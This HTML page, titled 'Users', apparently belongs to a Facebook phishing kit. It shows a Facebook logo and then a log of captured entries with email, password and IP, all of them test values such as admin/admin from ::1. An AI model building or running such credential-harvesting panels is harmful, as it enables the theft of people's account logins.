<!DOCTYPE html>
<html>
<link rel="icon" type="png" sizes="16x16" href="Imagen/bloger.png">
<head>
	<title>Users</title>
</head>



<link rel="stylesheet" media="screen" type="text/css" href="normal.css" />
<style type="text/css">
	body {
    -webkit-touch-callout: none ;
    -webkit-text-size-adjust: none ; -ms-text-size-adjust: none ;
    -webkit-user-select: none ; -moz-user-select: none ; -ms-user-select: none ; user-select: none ;
    -webkit-highlight: none ;
    -webkit-tap-highlight-color: rgba(0,0,0,0) ;
    -webkit-tap-highlight-color: transparent ;      /* For some Androids */
    -ms-touch-action: pan-y ;
    -ms-content-zooming: none ;	
		
    margin:0px;
    padding:0px;
    font-family: Consolas;
    background:black;

	}



h2{
	  
	font-size: 18px;
    margin: 0% 0% 0% 0%;
    width: 100%;
	font-family: Consolas;

}

h1{
	    color: blue;
	font-size: 30px;
    margin: 0% 0% 0% 0%;
	font-family: Consolas;
}


img{
 	margin:0% 0% 0% 0%;
    padding: 0% 0% 0% 0%;
    width: 15% ;
background:black;
	
    

	background-position: center;

}

</style>

<body style="background-color:#ff223;">
<center><strong><h1>Facebook</h1></strong>
<img src="imagen/logo.png" height="200" width="200">
<h2><a href="https://lpericena.blogspot.com/2017/06/blog-post_9.html" target="_blank" title="Then Seven Code"><h5>Servicio de ayuda</h5></a></h2>
<center>Email: [<b><font color="#0000FF">Users</font></b>]
 Password: [<b><font color="#FF0040">Password</font></b>]
 IP: [<b><font color="#FE2EF7">Ip</font></b>][Facebook]<br></center>
</center>
</body>


<center>Email: [<b><font color="#FFFFF">admin</font></b>]Password: [<b><font color="#FFFFF">admin</font></b>]IP: [<b><font color="#FFFFFF">::1</font></b>]<br><center>Email: [<b><font color="#FFFFFF">admin</font></b>]Password: [<b><font color="#FFFFFF">admin</font></b>]IP: [<b><font color="#FFFFFF">::1</font></b>]<br><center>Email: [<b><font color="#FFFFFF">adminffffffffffffffff</font></b>]Password: [<b><font color="#FFFFFF">adminfffffffffff</font></b>]IP: [<b><font color="#FFFFFF">::1</font></b>]<br><center><#FFFFF>Email: [<b><font color="#FFFFFF">adminffffffffffffffff</font></b>]Password: [<b><font color="#FFFFFF">GGGGGGGGGGGGGG</font></b>]IP: [<b><font color="#FFFFFF">::1</font></b>]<br><center>Email: [<b><font color="#FFFFFF">admin</font></b>]Password: [<b><font color="#FFFFFF">admin</font></b>]IP: [<b><font color="#FFFFFF">::1</font></b>]<br><center>Email: [<b><font color="#FFFFFF">admin</font></b>]Password: [<b><font color="#FFFFFF">admin</font></b>]IP: [<b><font color="#FFFFFF">::1</font></b>]<br><center>Email: [<b><font color="#FFFFFF"></font></b>]Password: [<b><font color="#FFFFFF"></font></b>]IP: [<b><font color="#FFFFFF">::1</font></b>]<br><center>Email: [<b><font color="#FFFFFF">admin</font></b>]Password: [<b><font color="#FFFFFF">admin</font></b>]IP: [<b><font color="#FFFFFF">::1</font></b>]<br><center>Email: [<b><font color="#FFFFFF">admin</font></b>]Password: [<b><font color="#FFFFFF">admin</font></b>]IP: [<b><font color="#FFFFFF">::1</font></b>]<br><center>Email: [<b><font color="#FFFFFF">admin</font></b>]Password: [<b><font color="#FFFFFF">admin</font></b>]IP: [<b><font color="#FFFFFF">::1</font></b>]<br>